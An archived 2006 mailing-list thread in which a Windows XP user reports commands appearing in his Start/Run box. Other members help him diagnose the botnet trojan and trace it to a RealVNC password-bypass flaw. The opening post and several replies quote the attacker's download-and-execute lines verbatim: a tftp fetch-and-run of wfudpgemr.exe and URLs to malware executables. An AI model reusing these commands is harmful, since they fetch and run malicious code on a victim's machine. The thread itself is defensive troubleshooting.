Searching \ for '[EE]: WINXP Malware Attacks? CAUTION - POSSIBLE BA' in subject line. ()
Make payments with PayPal - it's fast, free and secure! Help us get a faster server
FAQ page: techref.massmind.org/techref/index.htm?key=winxp+malware+attacks
Search entire site for: 'WINXP Malware Attacks? CAUTION - POSSIBLE BA'.

Exact match. Not showing close matches.
PICList Thread
'[EE]: WINXP Malware Attacks? CAUTION - POSSIBLE BA'
2006\10\05@144300 by Carey Fisher - NCS

face picon face
Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:

http://homepage.my-place.us/system.exe

Well, I immediately disabled the network connection and I don't think this program was executed.

Then I scrolled through the Run window and found the following 3 lines:

cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
http://kruma.us/vn.exe  
%SYSTEMROOT%\SYSTEM32\CMD.EXE

This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission.   This is why the first one didn't run.  I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).

Anybody know anything about any of these apparent attacks.  Any suggestions to prevent this particular exploit (START/Run)?

Thanks,
Carey

2006\10\05@150158 by Orin Eman

picon face
On 10/5/06, Carey Fisher - NCS <spam_OUTcareyfisherTakeThisOuTspamncsradio.com> wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission.   This is why the first one didn't run.  I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).
>
> Anybody know anything about any of these apparent attacks.  Any suggestions to prevent this particular exploit (START/Run)?


Some variant of:

http://www.sophos.com/security/analyses/trojtofgerb.html ?

Try a free trial of PCdefense... http://www.laplink.com/pcdefense/

Run all the scans as you appear to be infected with something.

Orin.

2006\10\05@151500 by Peter Bindels

picon face
Sounds like:

http://www.avira.com/en/threats/section/fulldetails/id_vir/1496/worm_rbot.aeu.79.html

BTW, tried the IRC server, it's down. Sounds like an old botnet.
I've also stumbled across (and misplaced) a website that claimed it
could come from using a web browser that supports VBS.

Regards & good luck,
Peter

On 05/10/06, Carey Fisher - NCS <.....careyfisherKILLspamspam@spam@ncsradio.com> wrote:
{Quote hidden}

> -

2006\10\05@153458 by James Newtons Massmind

face picon face
Check your "autoruns" using autoruns from sysinternals.
http://www.sysinternals.com/Utilities/Autoruns.html This is the list, in
case you don't know, that windows activates when it starts, and is an easy
way for malware to get itself started again when you reboot. Since this
means the malware does not need to modify an existing .exe to get started,
it will NOT appear on most anti-virus scans. Adaware does a better job of
catching these automatically, but I find that getting to know the autoruns
is a better way of combating the problem.

This has more info on your bad .exe
fileinfo.prevx.com/adware/qq276a42612891-WFUD25104328/WFUDPGEMR.EXE.h
tml

"WFUDPGEMR.EXE may use 5 or more path and file names, these are the most
common:
1 :%TEMP%\DHAYZLAUKX.EXE
2 :%WINDIR%\SYSTEM32\WFUDPGEMR1234.EXE"

Each of those may be listed in your autoruns.

Please DO keep us posted? I'm very interested to know what you find.

---
James.





> {Original Message removed}

2006\10\05@174705 by Philip Pemberton

face
flavicon
face
Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> h**p://h*m*p*g*.*y*p*a*e*u*/system.exe        [ URL declawed by PAP ]

ClamAV says:
philpem@wolf:~/MALWARE$ clamscan system_exe
system_exe: Trojan.Mybot-1445 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 71517
Engine version: 0.88.2
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 0.32 MB
Time: 46.696 sec (0 m 46 s)

Virusdata from Sophos is here:
http://www.sophos.com/security/analyses/w32rbotadh.html

If you don't have an antivirus installed, go find a clean machine, grab AVG
(from free.grisoft.com), burn it to CD, then install it. If AVG won't install,
get the firewall enabled and block *everything*. Go to
http://housecall.trendmicro.com/ and scan your system. Let it remove any
viruses it finds. Then install AVG.

Looks like pretty much your standard password stealing IRC botnet building
trojan/worm. If I get sufficiently bored, I'll throw it into a VMware sandbox
and pull it to bits with the old IDA freeware release and OllyDebug.

> This really surprised me since I've taken a lot of measures to secure my system
including a program that won't let new programs run without my permission.
This is why the first one didn't run.  I also run antivirus, I monitor the
router/firewall with Wallwatcher, and I block all inbound ports except a
couple (Skype, FreeVNC).

I notice you're using Outlook Express (the X-Mailer header told me <grin>).
FWIW, there are tons of exploits that allow remote code execution in OE. The
old double-extension bug, buffer overflows, the list goes on. I'd switch to
Mozilla Thunderbird (it's a pretty painless switch, Tbird can import most/all
of your mail and settings from OE).

What antivirus are you using?
I guess you've got a perimeter firewall on the router. Any firewall software
on the machine itself (e.g. ZoneAlarm)?

> Anybody know anything about any of these apparent attacks.  Any suggestions to prevent this particular exploit (START/Run)?

I wonder if someone exploited VNC... What's your VNC password like - all
lowercase and less than 8 characters maybe? And no numbers or symbols? :)

I have my network set up so that you have to SSH in (and use a public key to
authenticate yourself with the server), then you have to tunnel from the
server to the machines inside the network. There are only a few ports open on
the router - SSH, SMTP and HTTP. If I need to connect to a machine on the LAN
from the Internet, I don't add a port-forward, I use an SSH tunnel.

--
Phil.                         |  (\_/)  This is Bunny. Copy and paste Bunny
piclistspamKILLspamphilpem.me.uk         | (='.'=) into your signature to help him gain
http://www.philpem.me.uk/     | (")_(") world domination.

2006\10\05@193823 by Carey Fisher

face picon face
Thanks for the replies everyone... comments below...

Philip Pemberton wrote:
> Carey Fisher - NCS wrote:
>  
>> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>>
>> h**p://h*m*p*g*.*y*p*a*e*u*/system.exe        [ URL declawed by PAP ]
>>    
>
> ClamAV says:
> philpem@wolf:~/MALWARE$ clamscan system_exe
> system_exe: Trojan.Mybot-1445 FOUND
> ...
>  
....
> If you don't have an antivirus installed, go find a clean machine, grab AVG
> (from free.grisoft.com), burn it to CD, then install it. If AVG won't install,
> get the firewall enabled and block *everything*. Go to
> http://housecall.trendmicro.com/ and scan your system.  Let it remove any
> viruses it finds. Then install AVG.
>  

Yeah, I use AVG and keep it up to date.  I also used McAfee Virus Scan
and nothing can find a virus on that machine.
> I notice you're using Outlook Express (the X-Mailer header told me <grin>).
> FWIW, there are tons of exploits that allow remote code execution in OE. The
> old double-extension bug, buffer overflows, the list goes on. I'd switch to
> Mozilla Thunderbird (it's a pretty painless switch, Tbird can import most/all
> of your mail and settings from OE).
>  
I have Thunderbird on all but that one machine - in fact I'm using
Thunderbird now.  Maybe I should switch that last machine:)

> What antivirus are you using?
> I guess you've got a perimeter firewall on the router. Any firewall software
> on the machine itself (e.g. ZoneAlarm)?
>  
Just using the router for a firewall.  I've scanned it from outside and
no ports are open except VNC & SKYPE.  Also, I've set the DHCP on the
DSL Modem to reset every hour.

>  
>> Anybody know anything about any of these apparent attacks.  Any suggestions to prevent this particular exploit (START/Run)?
>>    
>
> I wonder if someone exploited VNC... What's your VNC password like - all
> lowercase and less than 8 characters maybe? And no numbers or symbols? :)
>  

That's what I'm wondering too...  my pw is >8 char and numbers and letters.
> I have my network set up so that you have to SSH in (and use a public key to
> authenticate yourself with the server), then you have to tunnel from the
> server to the machines inside the network. There are only a few ports open on
> the router - SSH, SMTP and HTTP. If I need to connect to a machine on the LAN
> from the Internet, I don't add a port-forward, I use an SSH tunnel.
>  
I also run StartUpMonitor so any new programs can't get stuck in as
autoruns.

I'll run Ethereal a while and see what I catch.  Maybe set up a
different machine as a "honeypot".

Carey

2006\10\05@195417 by Gerhard Fiedler

picon face
Carey Fisher wrote:

> Just using the router for a firewall.  

One reason for using a local firewall is to have better control over the
outgoing connections from your machine.

> I've scanned it from outside and no ports are open except VNC & SKYPE.

What ports do you open for Skype? I use it, and never opened any ports for
it.

> Also, I've set the DHCP on the DSL Modem to reset every hour.

Which doesn't help if you have a trojan on your machine...

I'm not sure whether this is too obvious, but do you know all processes
that run on your machine?

Gerhard

2006\10\05@204725 by Carey Fisher

face picon face
Gerhard Fiedler wrote:
> Carey Fisher wrote:
>  
>> Just using the router for a firewall.  
>>    
>
> One reason for using a local firewall is to have better control over the
> outgoing connections from your machine.
>
>  
I do have the XP firewall turned on but no third party ones.  And
Wallwatcher has never reported a blocked outbound connection...
hmmmm...blocked....
what about the ones that are not blocked...
{Quote hidden}

I have looked at the process list and looked up ones I didn't recognize
- nothing funny there.

Oh - another clue - never happens when I'm logged out of XP and never
happens when I disable the network connection on the machine.  I also
don't normally run with Admin privileges.

> Gerhard
>  
Carey

2006\10\06@023355 by Ruben Jönsson

flavicon
face
> Gerhard Fiedler wrote:
> > Carey Fisher wrote:
> >  
> >> Just using the router for a firewall.  
> >>    
> >
> > One reason for using a local firewall is to have better control over the
> > outgoing connections from your machine.
> >
> >  
> I do have the XP firewall turned on but no third party ones.  And
> Wallwatcher has never reported a blocked outbound connection...
> hmmmm...blocked....
> what about the ones that are not blocked...

The XP firewall does not block outgoing traffic. The new Vista and Windiws
Server firewall will.

/Ruben

==============================
Ruben Jönsson
AB Liros Electronic
Box 9124, 200 39 Malmö, Sweden
TEL INT +46 40142078
FAX INT +46 40947388
.....rubenKILLspamspam.....pp.sbbs.se
==============================

2006\10\06@073317 by Gerhard Fiedler

picon face
Carey Fisher wrote:

> Oh - another clue - never happens when I'm logged out of XP [...]

AFAIK it's not possible to insert into the keyboard buffer (which seems to
be what is happening) when you're not logged in or while the session is
locked. Which is good (in this case) and can be a pain (when trying to
automate a GUI application with something like AutoIt3 and wanting it to
work while the session is locked).

> [...] and never happens when I disable the network connection on the
> machine.  

Seems you do have an infection. Strange though that no virus scanner
catches it. Maybe you try to make a boot CD (look for BartPE for example)
with a few scanners and run them from the boot CD.

Gerhard

2006\10\06@091019 by Herbert Graf

flavicon
face
On Thu, 2006-10-05 at 14:42 -0400, Carey Fisher - NCS wrote:
> Today, as I was sitting at my WINXP machine working, the START/Run window popped open and some unknown force typed the following:
>
> http://homepage.my-place.us/system.exe
>
> Well, I immediately disabled the network connection and I don't think this program was executed.
>
> Then I scrolled through the Run window and found the following 3 lines:
>
> cmd /c tftp -i 10.0.6.28 GET wfudpgemr.exe &wfudpgemr.exe &exit
> http://kruma.us/vn.exe  
> %SYSTEMROOT%\SYSTEM32\CMD.EXE
>
> This really surprised me since I've taken a lot of measures to secure my system including a program that won't let new programs run without my permission.   This is why the first one didn't run.  I also run antivirus, I monitor the router/firewall with Wallwatcher, and I block all inbound ports except a couple (Skype, FreeVNC).

I'm no expert, but a google search on wfudpgemr.exe resulted in the
following hit:
http://virusinfo.prevx.com/pxparall.asp?PX5=276a54da005930a684a00178b3ce3300aa757be4&psection=desc

> Anybody know anything about any of these apparent attacks.  

Not really, haven't been paying much attention.

> Any suggestions to prevent this particular exploit (START/Run)?

Perhaps a little extreme for most, but: run a different OS. MacOS isn't
bad, I run Linux. TTYL

2006\10\06@122141 by Orin Eman

picon face
On 10/6/06, Gerhard Fiedler <EraseMElistsspam_OUTspamTakeThisOuTconnectionbrazil.com> wrote:
> Carey Fisher wrote:
>
> > Oh - another clue - never happens when I'm logged out of XP [...]
>
> AFAIK it's not possible to insert into the keyboard buffer (which seems to
> be what is happening) when you're not logged in or while the session is
> locked. Which is good (in this case) and can be a pain (when trying to
> automate a GUI application with something like AutoIt3 and wanting it to
> work while the session is locked).

It is possible.  Quite easy by inserting an upper filter driver abover
the keyoard driver.  It's done by the remote control applications.  It
does need admin rights to install and a reboot.  The really bad thing
is if you remove the driver but don't fix the registry, you lose your
keyboard!

Orin.

2006\10\06@132157 by James Newton

flavicon
face

> Oh - another clue - never happens when I'm logged out of XP
> and never happens when I disable the network connection on
> the machine.  I also don't normally run with Admin privileges.


The malware may be starting in your logon script.
http://www.windowsnetworking.com/articles_tutorials/wxpplogs.html

Again, autorun from sysinternals (a free utility) will list all possible
sources for the startup of any program. Finding and removing the entry for
the malware will stop it from gaining control of the system.
http://www.sysinternals.com/Utilities/Autoruns.html

Note that there are many strange looking things that DO need to start, and
you must be careful. Autoruns allows you to filter OUT Microsoft signed
programs, and it has a nice feature to google for the program name which
will generally allow you to see what it does and why.

Be sure to run it after booting in safemode so that they program will not be
able to re-install its self in the run list after you remove it.

---
James.



2006\10\06@150040 by Paul Hutchinson

picon face
> -----Original Message-----
> From: piclist-bouncesspamspam_OUTmit.edu On Behalf Of James Newton
> Sent: Friday, October 06, 2006 1:22 PM
>
>
<snip>
> the malware will stop it from gaining control of the system.
> http://www.sysinternals.com/Utilities/Autoruns.html


That reminds me, also run SysInternal's RootkitRevealer to see if you've
been taken over by one of the common rootkits.
http://www.sysinternals.com/Utilities/RootkitRevealer.html

Paul

2006\10\07@084442 by Howard Winter

face
flavicon
picon face
Carey,

On Thu, 05 Oct 2006 19:38:24 -0400, Carey Fisher wrote:

>...
> Just using the router for a firewall.  I've scanned it from outside and
> no ports are open except VNC & SKYPE.

The last time I tried to find out which port(s) Skype uses, I was unable to (they said something like "anything over 1024", which isn't very good for
filtering!).  Which ones do you use/allow through for Skype?

Cheers,


Howard Winter
St.Albans, England


2006\10\07@090552 by peter green

flavicon
face

>
> The last time I tried to find out which port(s) Skype uses, I was
> unable to (they said something like "anything over 1024", which
> isn't very good for
> filtering!).  Which ones do you use/allow through for Skype?
i don't use skype because i disaprove of their policies of raping other
users bandwidth to provide service to those on firewalled networks.

if you must use it i strongly advise against forwarding any ports for it
(even if you find out what listen port it uses) as this may allow your copy
of skype to become a supernode and suck up insane bandwidth (saturating a
100megabit connection is NOT unheared of).


2006\10\07@092402 by Gerhard Fiedler

picon face
peter green wrote:

> Howard Winter wrote:
>> The last time I tried to find out which port(s) Skype uses, I was unable
>> to (they said something like "anything over 1024", which isn't very
>> good for filtering!).  Which ones do you use/allow through for Skype?

FWIW, I'm behind an SMC firewall and I don't forward anything for Skype. It
seems to work with outbound connections only.

> i don't use skype because i disaprove of their policies of raping other
> users bandwidth to provide service to those on firewalled networks.

How's that? Do you have more detailed information?

Gerhard

2006\10\09@011824 by Frank Niu

picon face

How is this matter going?  Actually I encountered exact the same virus/worm
and don't know how to get rid of it.

Checked with sysinternal autorun.exe, found nothing suspicious. I'm pretty
sure it has something to do with VNC: This issue occurs with my 3 machines
with VNC server installed every a few minutes intermittently. After I closed
VNC server, seems it won't occur for now.

Any final solution for this?


--
View this message in context: www.nabble.com/-EE-%3A-WINXP-Malware-Attacks--CAUTION---POSSIBLE-BAD-LINKS-LISTED-tf2391073.html#a6701146
Sent from the MicroControllers - PIC mailing list archive at Nabble.com.

2006\10\09@064617 by Gerhard Fiedler

picon face
Frank Niu wrote:

> I'm pretty sure it has something to do with VNC: This issue occurs with
> my 3 machines with VNC server installed every a few minutes
> intermittently. After I closed VNC server, seems it won't occur for now.
>
> Any final solution for this?

Going with the standard comment "use Linux": use NetMeeting :)

Wouldn't expose it on the Internet, but on a LAN behind a firewall I don't
see a problem.

Gerhard

2006\10\09@093647 by Carey Fisher

face picon face

Frank Niu wrote:
> How is this matter going?  Actually I encountered exact the same virus/worm
> and don't know how to get rid of it.
>
>  
I've scanned with multiple virus scanners including AVG and Norton.  
I've run Adaware and Spybot and I've
found nothing at all.

Also, still no intrusions with any one or more of the following true:
VNC stopped
network disconnected
logged out

> Checked with sysinternal autorun.exe, found nothing suspicious. I'm pretty
> sure it has something to do with VNC: This issue occurs with my 3 machines
> with VNC server installed every a few minutes intermittently. After I closed
> VNC server, seems it won't occur for now.
>
> Any final solution for this?
> pe a
>  
I'm convinced there is no virus in the machine and it seems someone is
trying to (manually?) type a command in the Start/Run box as if they are
sitting in front of the computer.

So, that sorta leaves VNC except I have it running as a Service which
means if someone was using VNC they could still use it when all users
are logged out except they can't login cause I have a strong password.  
I have 3 machines with VNC but only one is forwarded to from the
router.  That's the one that's being compromised.

Now I'm investigating my Wi-Fi nodes.

Carey

2006\10\09@123414 by Orin Eman

picon face
On 10/9/06, Carey Fisher <@spam@careyfisherKILLspamspamncsradio.com> wrote:
{Quote hidden}

VNC's password encryption _wasn't_ last time I looked.  If you can
sniff the network, it doesn't matter how strong the password is.

As for WiFi, what encryption are you using?  WEP isn't secure.  I've
deliberately sniffed my own network with kismet and run aircrack.  It
took a couple of GB of data, but it found the key.

Orin.

2006\10\09@171709 by Dave Wheeler

flavicon
face


A google for VNC vulnerability leads to a mass of undocumented features :-)
Most have been fixed in the latest versions

Dave

2006\10\09@183733 by James Newtons Massmind

face picon face
> I'm convinced there is no virus in the machine and it seems
> someone is trying to (manually?) type a command in the
> Start/Run box as if they are sitting in front of the computer.
>
> So, that sorta leaves VNC except I have it running as a
> Service which means if someone was using VNC they could still
> use it when all users are logged out except they can't login
> cause I have a strong password.  
> I have 3 machines with VNC but only one is forwarded to from
> the router.  That's the one that's being compromised.
>
> Now I'm investigating my Wi-Fi nodes.
>
> Carey


Wow! Sounds like VNC is being compromised... I would get ethereal (sniffing
the glue that holds the internet together) fired up and set to look for that
string and log any packets containing it.

If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to start
looking for a VPN solution and VNC was on my list to check.

---
James.


2006\10\09@192655 by Gerhard Fiedler

picon face
James Newtons Massmind wrote:

> If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to start
> looking for a VPN solution and VNC was on my list to check.

Does VNC include a VPN? I thought it was a remote control server/client
application.

I'm using an SMC Barricade router that has a VPN server built-in. That's
quite convenient and really simple to set up.

BTW, running VNC over a VPN could be a workaround for Carey. This way the
VNC traffic is not exposed directly to the Internet (or the wireless LAN).

Gerhard

2006\10\09@194459 by Bob Blick

face picon face

>
> If it is VNC, I'm sorry to hear it. The bosses daughter just ask me to
> start
> looking for a VPN solution and VNC was on my list to check.

Hi James,

VNC is not VPN - but if you are using it on the internet, you should use
it inside a VPN or SSH.

Another remote client/server you might look at is NX (No Machine). It uses
less bandwidth but is much more processor intensive than VNC. And is not
open source(although there are free beer versions). It uses SSH by
default, I believe. (I only use these things locally behind a firewall, so
I don't pay much attention to that part of it).

Cheerful regards,

Bob


2006\10\09@235059 by Rich Mulvey

flavicon
face
James Newtons Massmind wrote:
{Quote hidden}

  One thing to be aware of is that "VNC" is really just a reference to
a protocol, and not a particular application.  There are literally
dozens of different implementations of VNC - some commercial, some open
source, etc.  Some have holes big enough to drive a truck through, while
others are reasonably secure.

  That being said, there's no way in heck I'd ever use any VNC
application that wasn't being tunneled over a VPN or SSH.

- Rich


2006\10\10@004747 by Orin Eman

picon face
On 10/9/06, Rich Mulvey <KILLspamrichKILLspamspammulveyfamily.com> wrote:
>    One thing to be aware of is that "VNC" is really just a reference to
> a protocol, and not a particular application.  There are literally
> dozens of different implementations of VNC - some commercial, some open
> source, etc.  Some have holes big enough to drive a truck through, while
> others are reasonably secure.
>
>    That being said, there's no way in heck I'd ever use any VNC
> application that wasn't being tunneled over a VPN or SSH.

That's safest...

If you want a (rather old now) SSL enabled VNC, it's available from:

http://www.laplink.com/products/vnc/overview.asp

Orin.

2006\10\10@143658 by James Newtons Massmind

face picon face
> Hi James,
>
> VNC is not VPN - but if you are using it on the internet, you
> should use it inside a VPN or SSH.

I was suffering from confabulation. ;o)

> Another remote client/server you might look at is NX (No
> Machine). It uses less bandwidth but is much more processor
> intensive than VNC. And is not open source(although there are
> free beer versions). It uses SSH by default, I believe. (I
> only use these things locally behind a firewall, so I don't
> pay much attention to that part of it).

Thanks, I'll check it out.

---
James.


2006\10\10@192508 by Carey Fisher

face picon face
Orin Eman wrote:
{Quote hidden}

I understand what you guys are saying and I do have a VPN equipped
router at this location.  
But I need (want?) to access the machine in question from nearly
anywhere and any machine
so I can't count on being able to setup a tunnel from just anywhere.
Maybe I should just run VNC over a VPN connection between here and the
one other place
I spend a lot of time.  I can install a VPN router there.
BTW, I'm running RealVNC and my password is ............ at IP address
192.168.99.257
;)
Carey

2006\10\10@215014 by Jake Anderson

flavicon
face
Carey Fisher wrote:
{Quote hidden}

perhaps enable web managment of your router (as in from outside) with a
good password.
then allow port forwards from the machine your on when you want to use
it? rather than from the whole net the whole time.

Otherwise get a "real" firewall (linux style) and put a port knock thing
on (doorman) that will allow you in.

2006\10\10@220752 by Orin Eman

picon face
On 10/10/06, Carey Fisher <TakeThisOuTcareyfisherEraseMEspamspam_OUTncsradio.com> wrote:
{Quote hidden}

That's what Laplink Everywhere does...  it's not free though.  It uses
a Java VNC viewer to try to cover as many client operating systems as
possible - if you have access to a Java enabled browser, you can
access your VNC server.

I don't recall if the open source Java VNC viewer that's available
from the above link will make a direct connection to a VNC server or
not (if not, the change would be trivial), but it will do SSL as will
the server I originally mentioned.

Orin.

2006\10\10@221927 by Gerhard Fiedler

picon face
Carey Fisher wrote:

> I understand what you guys are saying and I do have a VPN equipped router
> at this location. But I need (want?) to access the machine in question
> from nearly anywhere and any machine so I can't count on being able to
> setup a tunnel from just anywhere. Maybe I should just run VNC over a
> VPN connection between here and the one other place I spend a lot of
> time.  I can install a VPN router there.

A PPTP connection is set up pretty quickly on any recent Windows PC, and
doesn't need a special router. (Most let it pass, for one connection at
least.)

Gerhard

2006\10\11@030943 by Orin Eman

picon face
On 10/10/06, Gerhard Fiedler <listsEraseMEspam.....connectionbrazil.com> wrote:
> Carey Fisher wrote:
>
> > I understand what you guys are saying and I do have a VPN equipped router
> > at this location. But I need (want?) to access the machine in question
> > from nearly anywhere and any machine so I can't count on being able to
> > setup a tunnel from just anywhere. Maybe I should just run VNC over a
> > VPN connection between here and the one other place I spend a lot of
> > time.  I can install a VPN router there.
>
> A PPTP connection is set up pretty quickly on any recent Windows PC, and
> doesn't need a special router. (Most let it pass, for one connection at
> least.)

Whether it works or not is a different matter...

Sorry for the rant, but my copy of XP at home can't handle a bad
packet during the PPTP startup and just sits and sulks.  A Win2k
virtual machine under Vmware on Gentoo Linux however works fine...

Orin.

2006\10\11@032935 by Philip Pemberton

face
flavicon
face
Orin Eman wrote:
> That's what Laplink Everywhere does...  it's not free though.  It uses
> a Java VNC viewer to try to cover as many client operating systems as
> possible - if you have access to a Java enabled browser, you can
> access your VNC server.

TightVNC has a built-in HTTP server and Java client, too. IIRC it runs on port
5800.

--
Phil.                         |  (\_/)  This is Bunny. Copy and paste Bunny
EraseMEpiclistspamphilpem.me.uk         | (='.'=) into your signature to help him gain
http://www.philpem.me.uk/     | (")_(") world domination.

2006\10\11@052328 by Frank Niu

picon face

I got a announcement about this issue. It is indeed a VNC-related security
problem. You need to upgrade the VNC version. ( I upgrade to 4.1.2)

**********************************
There is a known exposure in some versions of the popular program VNC by
which an attacker can get past the password protection and compromise the
system.   It was found in the "RealVNC" version and an upgrade which fixes
this exposure is available.  Other versions of VNC may or may not be
affected.  

Recently, a program which exploits this vulnerability has been spotted in
the wild.     The corporate threat team is aware of this and has set the
corporate IPS systems to block this worm when spotted and to issue service
desk tickets against the source address (if internal).    At this time,
there is no indication that a "CIO Patch Override" will be needed.


If you currently use RealVNC to remotely access your systems please check
that you have the latest build of your version of RealVNC.  During the
recent Digital Threat and Risk Assessment it was discovered that older
builds of RealVNC has vulnerabilities that can be (and were) exploited to
gain unauthorized access to systems.

You will need to upgrade your version of RealVNC if you have a build date
earlier then MAY 2006.  RealVNC upgrades are available at
http://www.realvnc.com/upgrade.html

*********************************


Carey Fisher - NCS wrote:
{Quote hidden}

> --

2006\10\11@064506 by Bob Axtell

face picon face
Frank Niu wrote:
> I got a announcement about this issue. It is indeed a VNC-related security
> problem. You need to upgrade the VNC version. ( I upgrade to 4.1.2)
>
> **********************************
> There is a known exposure in some versions of the popular program VNC by
> which an attacker can get past the password protection and compromise the
> system.   It was found in the "RealVNC" version and an upgrade which fixes
> this exposure is available.  Other versions of VNC may or may not be
> affected.  
>  
That's a very important catch, Frank. Thanks!

--Bob

{Quote hidden}

>> --

2006\10\11@093308 by Gerhard Fiedler

picon face
Orin Eman wrote:

>> A PPTP connection is set up pretty quickly on any recent Windows PC, and
>> doesn't need a special router. (Most let it pass, for one connection at
>> least.)
>
> Whether it works or not is a different matter...
>
> Sorry for the rant, but my copy of XP at home can't handle a bad
> packet during the PPTP startup and just sits and sulks.  A Win2k
> virtual machine under Vmware on Gentoo Linux however works fine...

Well, yes, YMMV :)  

FWIW, I use PPTP regularly to connect to my home LAN (SMC router with
built-in VPN server) from my WinXP Pro notebook, and I never had a problem.

Gerhard

2006\10\11@144340 by Richard Prosser

picon face
As does UltraVNC.
RP

On 11/10/06, Philip Pemberton <RemoveMEpiclistEraseMEspamEraseMEphilpem.me.uk> wrote:
{Quote hidden}

> -

2006\10\11@202439 by Carey Fisher

face picon face
Bob Axtell wrote:
> Frank Niu wrote:
>  
>> I got a announcement about this issue. It is indeed a VNC-related security
>> problem. You need to upgrade the VNC version. ( I upgrade to 4.1.2)
>>
>> **********************************
>> There is a known exposure in some versions of the popular program VNC by
>> which an attacker can get past the password protection and compromise the
>> system.   It was found in the "RealVNC" version and an upgrade which fixes
>> this exposure is available.  Other versions of VNC may or may not be
>> affected.  
>>  
>>    
> That's a very important catch, Frank. Thanks!
>
> --Bob
>
>  
Yes, thanks Frank!
Carey

2006\10\11@202607 by Carey Fisher

face picon face
Gerhard Fiedler wrote:
{Quote hidden}

Gerhard,
I like your approach and am going to try it - VPN server-in-router at
main location, setup PPTP at the other end.
Thanks,
Carey

2006\10\12@091335 by Gerhard Fiedler

picon face
Carey Fisher wrote:

> I like your approach and am going to try it - VPN server-in-router at
> main location, setup PPTP at the other end.

FWIW, my router supports also IPsec. However, I find PPTP has generally
worked well for me and it is very quick and easy to set up on Win2k+
systems without any additional software.

Gerhard

More... (looser matching)
- Last day of these posts
- In 2006 , 2007 only
- Today
- New search...